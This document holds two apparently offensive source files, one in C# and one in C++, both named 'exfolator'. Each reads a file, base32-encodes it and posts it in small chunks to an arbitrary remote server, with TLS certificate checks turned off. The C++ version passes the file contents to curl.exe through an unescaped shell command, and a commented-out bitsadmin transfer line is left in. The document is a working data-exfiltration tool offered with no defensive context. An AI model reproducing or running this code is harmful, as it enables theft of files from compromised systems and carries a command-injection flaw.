File: exfolator.cs
using System;
using System.IO;
using System.Net;
using System.Text;
using System.Collections.Generic;

class MyFirstClass
{
	static void error(string msg)
	{
		Console.Error.WriteLine("[-] Error: " + msg);
		Environment.Exit(1);
	}

	static void usage()
	{
		string name = Path.GetFileName(Environment.GetCommandLineArgs()[0]);
		Console.WriteLine("Usage: " + name + " <options>");
		Console.WriteLine("Options:");
		Console.WriteLine("  -u, --url\t\tServer url.");
		Console.WriteLine("  -f, --file\t\tMain file.");
		Console.WriteLine("  -b, --bytes\t\tMax bytes per run. (default: 50)");
		Environment.Exit(0);
	}

	static void proc(string url, string post_data)
	{
		WebClient client = new WebClient();
		ServicePointManager.ServerCertificateValidationCallback = (sender, cert, chain, sslPolicyErrors) => true;
		client.Headers[HttpRequestHeader.ContentType] = "application/x-www-form-urlencoded";
		byte[] responseBytes = client.UploadData(url, "POST", System.Text.Encoding.UTF8.GetBytes(post_data));
		string responseBody = System.Text.Encoding.UTF8.GetString(responseBytes);
	}

	static string encode(byte[] data)
	{
		string base32Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567";
		StringBuilder encoded = new StringBuilder();
		int bits = 0;
		int value = 0;

		foreach (byte b in data)
		{
			value = (value << 8) | b;
			bits += 8;

			while (bits >= 5)
			{
				encoded.Append(base32Chars[(value >> (bits - 5)) & 0x1F]);
				bits -= 5;
			}
		}

		if (bits > 0)
		{
			value <<= (5 - bits);
			encoded.Append(base32Chars[value & 0x1F]);
		}

		// Add padding if necessary
		while (encoded.Length % 8 != 0)
			encoded.Append('=');

		return encoded.ToString();
	}

	static List<string> Split(string str, int bytes)
    {
        List<string> strings = new List<string>();

        if (str.Length > bytes)
        {
            for (int i = 0; i < str.Length; i += bytes)
            {
                int sLen = Math.Min(bytes, str.Length - i);
                strings.Add(str.Substring(i, sLen));
            }
        }
        else strings.Add(str);
        return strings;
    }

	static void Main(string []args)
	{
		string url = "", file = "", contents = "";
		int bytes = 50;

		Console.CancelKeyPress += (sender, e) =>
        {
        	Console.WriteLine("\n[-] Exiting...");
            Environment.Exit(1);
        };

		if (args.Length < 4 || args.Length > 7)
			usage();

		for (int i = 0; i < args.Length; i++)
		{
			if (args[i] == "-h" || args[i] == "--help")
				usage();

			else if (args[i] == "-u" || args[i] == "--url")
			{
				try{url = args[i+1];}
				catch (IndexOutOfRangeException){error("-u/--url expected a proper https url or atleast an ip.");}
				if (!url.StartsWith("http"))
					url = "https://" + url;
			}

			else if (args[i] == "-f" || args[i] == "--file")
			{
				try
				{
					file = Path.GetFileName(args[i+1]);
					contents = encode(File.ReadAllBytes(args[i+1]));
				}
				catch (IndexOutOfRangeException){error("-f/--file expected a proper file.");}
				catch (FileNotFoundException){error("File not found.");}
			}

			else if (args[i] == "-b" || args[i] == "--bytes")
			{
				try
				{
					if (!int.TryParse(args[i+1], out bytes))
						throw new IndexOutOfRangeException();
				}
				catch (IndexOutOfRangeException){error("-b/--bytes expected a integer.");}
			}
		}

		float p = 1.0F;
		List<string> data = Split(contents, bytes);
		Console.Write("[>] Starting Transmission...[ENTER]");
		Console.ReadKey();
		Console.WriteLine();
		foreach (string buf in data)
		{
			string post_data = "file=" + file + "&data=" + buf;
			proc(url, post_data);
			Console.Write("[>] Progress: " + (float) Math.Round(p / data.Count * 100, 2) + "%\r");
			p++;
		}
	}
}

File: exfolator.cpp
#include <cmath>
#include <vector>
#include <csignal>
#include <cstring>
#include <fstream>
#include <iostream>
#include <sys/stat.h>
#include <cstdlib>

using namespace std;

void handle(int sig)
{
	cout << "\n[-] Exiting...\n";
	exit(0);
}

void error(string msg)
{
	cerr << "[-] Error: " << msg << endl;
	exit(1);
}

static bool startswith(const string& s, const string& prefix)
{
    return s.size() >= prefix.size() && s.compare(0, prefix.size(), prefix) == 0;
}

string read(const char *file)
{
	string text, contents = "";

	struct stat sb;
	stat(file, &sb);
	if (!S_ISREG(sb.st_mode))
		error("File can't be found.");

	ifstream f(file);
	while (getline(f, text))
	{
		contents = contents + text + '\n';
	}

	return contents;
}

string encode(string text)
{
	string base32_chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567";
	string encoded;
	size_t i = 0;
	int bits = 0;
	int value = 0;

	for (char c : text)
	{
		value = (value << 8) | static_cast<unsigned char>(c);
		bits += 8;

		while (bits >= 5)
		{
            encoded.push_back(base32_chars[(value >> (bits - 5)) & 0x1F]);
            bits -= 5;
        }
	}

	if (bits > 0)
	{
		value <<= (5 - bits);
		encoded.push_back(base32_chars[value & 0x1F]);
	}

	// Add padding if necessary
	while (encoded.size() % 8 != 0)
	{
		encoded.push_back('=');
	}

	return encoded;
}

vector<string> split(string str, int bytes)
{
    vector<string> strings;

    if (str.length() > bytes)
    {
        for (size_t i = 0; i < str.length(); i += bytes)
        {
            strings.push_back(str.substr(i, bytes));
        }
    }
    else
    {
        strings.push_back(str);
    }

    return strings;
}

string getoutput(string cmd)
{
	FILE *pipe = popen(cmd.c_str(), "r");
	if (!pipe)
		error("Command execution failed.");

	char buf[1024];
	string res = "";
	while (!feof(pipe))
	{
		if(fgets(buf, 1024, pipe) != NULL)
			res += buf;
	}
	pclose(pipe);
	return res;
}

int main(int argc, char *argv[])
{
	signal(SIGINT, handle);
	int bytes = 50;
	string file, url = "", contents = "";

	char *name;
	(name = strrchr(argv[0], '\\')) ? ++name : (name = argv[0]);

	if (argc < 5 || argc > 7)
	{
		cout << "Usage: " << name << " -u <url> -f <file>\n";
		cout << "\nOptions:\n";
		cout << "  -u, --url\tServer url.\n";
		cout << "  -f, --file\tTarget file.\n";
		cout << "  -b, --bytes\tMax bytes per turn. (default: 50)\n";
		exit(0);
	}

	for (int i = 0; i < argc; i++)
	{
		string tmp = argv[i];
		if (!tmp.compare("-u") || !tmp.compare("--url"))
		{
			if (!argv[i+1])
				error("-u/--url expected an url or a ip atleast.");

			url = argv[i+1];

			if (!startswith(url, "http"))
				url = "https://" + url;
		}

		else if (!tmp.compare("-b") || !tmp.compare("--bytes"))
		{
			if (!argv[i+1])
				error("-b/--bytes expected an int argument.");
			
			bytes = stoi(argv[i+1]);
		}

		else if (!tmp.compare("-f") || !tmp.compare("--file"))
		{
			if (!argv[i+1])
				error("-f/--file expected a proper file.");

			file = argv[i+1];
			contents = encode(read(file.c_str()));
		}
	}

	if (contents == "" || url == "")
		error("Required both a valid url and a valid file.");

	vector<string> data = split(contents, bytes);

	cout << "[>] Starting transmission...[ENTER]";
	getchar();

	float p = 1.0;
	float size = static_cast<float>(data.size());
	for (auto &s : data)
	{
		string post_data = "file=" + file + "&data=" + s;
		string cmd = "curl.exe -sk " + url + " -X POST -d \"" + post_data + "\"";
		getoutput(cmd);
	}
}
// string command = "bitsadmin /transfer test /download /priority normal " + url + " > nul 2>&1";
